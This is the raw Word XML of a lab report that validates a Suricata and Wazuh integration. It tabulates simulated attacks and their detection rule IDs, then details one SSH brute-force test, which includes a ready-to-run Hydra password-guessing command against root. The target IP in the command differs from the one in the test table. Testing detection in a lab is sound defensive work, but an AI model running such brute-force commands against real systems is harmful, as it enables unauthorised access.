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1AF54" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFFB31" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Attack Detection &amp; Validation Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8439D4" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab Environment | March 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB483D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF3E47" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This document records the attack simulation tests conducted to validate the Suricata IDS and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SIEM integration. Each test includes the tool used, command executed, expected and actual detection results, and recommended SOC analyst response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04F5C6" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p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719"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="2820"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="3AE0F04A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719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</w:tcPr>
          <w:p w14:paraId="1B556774" w14:textId="77777777" w:rsidR="008A552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021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</w:tcPr>
          <w:p w14:paraId="366E7B4C" w14:textId="77777777" w:rsidR="008A552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Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="282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</w:tcPr>
          <w:p w14:paraId="477CE841" w14:textId="77777777" w:rsidR="008A552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18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</w:tcPr>
          <w:p w14:paraId="1DE6D0B2" w14:textId="77777777" w:rsidR="008A552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Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="7D393C24" w14:textId="77777777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26F267D" w14:textId="7EAA40E0" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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D2480EB" w14:textId="6487BDDF" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH brute-force attack </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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C72ACB5" w14:textId="468BEE73" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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65886D4" w14:textId="51035C8B" w:rsidR="000135DF" w:rsidRDefault="001631E0" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5763</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="29EAF7D2" w14:textId="77777777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17C53C13" w14:textId="7D8C6723" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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049E5649" w14:textId="0E5D9205" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RDP brute-force attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4960D688" w14:textId="057D0577" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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2312F919" w14:textId="37688244" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="3EC20F17" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr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631EE8F" w14:textId="41638D3A" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="009306DD">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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499B16D" w14:textId="232DBEBE" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="009306DD">
              <w:t>TCP SYN Port Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7387566" w14:textId="4AEF7E88" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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BFC7285" w14:textId="3D42D95C" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="009306DD">
              <w:t>86601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="783773E5" w14:textId="77777777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35C9B6BB" w14:textId="583462E2" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00ED7A6D">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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1673E174" w14:textId="6CC24B1F" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00ED7A6D">
              <w:t>Service Version Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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769CD77C" w14:textId="670A10A4" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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7A03A0A9" w14:textId="55AD2C1F" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00ED7A6D">
              <w:t>86601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="7B8D0124" w14:textId="77777777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26605D1" w14:textId="5B83D106" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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EF9CC83" w14:textId="6AF6AD8A" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthorized modification </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0279029" w14:textId="146C8996" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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8D26C2E" w14:textId="27C54188" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="001C704B">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="37BB7F9B" w14:textId="77777777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6B71B983" w14:textId="77777777" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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04E6C51D" w14:textId="77777777" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web Shell Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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24249A04" w14:textId="77777777" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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2B3552F0" w14:textId="77777777" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>554</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="5F71F6BA" w14:textId="77777777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F1B1C8D" w14:textId="0D6CDE99" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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E230C63" w14:textId="24A45991" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">alicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64FE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> job entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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19F1086" w14:textId="500CE7AE" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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E49C75D" w14:textId="14353BBF" w:rsidR="000135DF" w:rsidRDefault="00FE45BE" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2832</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="4E7C4576" w14:textId="77777777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32132366" w14:textId="73EAE5F5" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF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4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2341D420" w14:textId="1584DC25" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EICAR Test File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2F73A1D3" w14:textId="24FE3FE6" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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0213D919" w14:textId="48E626D5" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>62138</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="4AA4349A" w14:textId="77777777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1AC73612" w14:textId="0287CAAA" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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4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67721792" w14:textId="2E768C17" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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Suspicious Encoded PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1EFF1D60" w14:textId="14E907E8" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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3C169D7A" w14:textId="4AE10694" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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92057, 92213</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="2B65E969" w14:textId="77777777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6842B3EA" w14:textId="2F04E12C" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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4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61FCF67E" w14:textId="693F260E" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:pP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Netcat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C2 Simulation (IRC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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40891B7C" w14:textId="36A3D575" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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66F04A79" w14:textId="4640B256" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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86601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="1ADEED1B" w14:textId="77777777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78CBFAE0" w14:textId="164271A9" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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4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44646959" w14:textId="0E0F1945" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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SQL Injection via DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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5B2A4C7A" w14:textId="74491A5F" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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00C4D9AA" w14:textId="33859218" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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86601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000135DF" w14:paraId="5D686ED8" w14:textId="77777777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3C1E9D5D" w14:textId="0F322A73" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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4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7D87C91B" w14:textId="129323FE" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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ICMP Flood &amp; Ping Sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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5D3B0638" w14:textId="31D8932D" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135DF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="276221"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detected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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C6A8476" w14:textId="5C92FF43" w:rsidR="000135DF" w:rsidRDefault="000135DF" w:rsidP="000135D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86601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10818E3F" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t>Test Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD90DEF" w14:textId="2DD06E04" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 1: Attack 1 — SSH Brute-force Attack</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B64FE3" w14:paraId="0C371E82" w14:textId="77777777" w:rsidTr="00450E65">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="34F85C06" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65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</w:tcPr>
          <w:p w14:paraId="36EF0F9F" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65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B64FE3" w14:paraId="5F4E68EE" w14:textId="77777777" w:rsidTr="00450E6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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="399A093D" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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56142D9" w14:textId="708A66E3" w:rsidR="00B64FE3" w:rsidRDefault="008E4C2C" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="596F52F5" w14:textId="77777777" w:rsidTr="00450E6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E1C5417" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Source IP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7FD2EA31" w14:textId="07060436" w:rsidR="00B64FE3" w:rsidRDefault="00151B2A" w:rsidP="00450E65">
            <w:r w:rsidRPr="00151B2A">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.0.159 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008E4C2C">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>( Debian</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="008E4C2C"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 w:rsidR="008E4C2C">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WSL )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="06BEBC74" w14:textId="77777777" w:rsidTr="00450E6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ECE7645" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Destination IP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19BF2CE" w14:textId="7A41CF7C" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.</w:t>
            </w:r>
            <w:r w:rsidR="008E4C2C">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>151</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="7466C09E" w14:textId="77777777" w:rsidTr="00450E6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E506C1B" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Expected Rule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E5029F7" w14:textId="72AB2CAA" w:rsidR="00B64FE3" w:rsidRDefault="00B651D7" w:rsidP="00450E65">
            <w:r w:rsidRPr="00B651D7">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET SCAN Potential SSH Scan / SSH Brute Force Attempt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="44C6F32E" w14:textId="77777777" w:rsidTr="00450E6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24F87013" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Actual Alert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9F05A59" w14:textId="3FD861D7" w:rsidR="00B64FE3" w:rsidRPr="00370489" w:rsidRDefault="00C21022" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sid:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5763 — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sshd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: brute force trying to get access to the system. Authentication failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="75B1247C" w14:textId="77777777" w:rsidTr="00450E6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F6C064D" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65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Category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E3A829B" w14:textId="0B384994" w:rsidR="00B64FE3" w:rsidRDefault="00C21022" w:rsidP="00450E65">
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">syslog, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sshd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C21022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21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>authentication_failures</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="2F4B0159" w14:textId="77777777" w:rsidTr="00450E6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27D1A162" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65"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028FBA7" w14:textId="392C82FF" w:rsidR="00B64FE3" w:rsidRDefault="00C21022" w:rsidP="00450E65">
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High (Level 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B7F7857" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438869D" w14:textId="0C8CBA58" w:rsidR="00B64FE3" w:rsidRDefault="00C21022" w:rsidP="00B64FE3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C21022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hydra -l root -P rockyou.txt ssh://192.168.0.152 -t 4 -V</w:t>
      </w:r>
    </w:p>
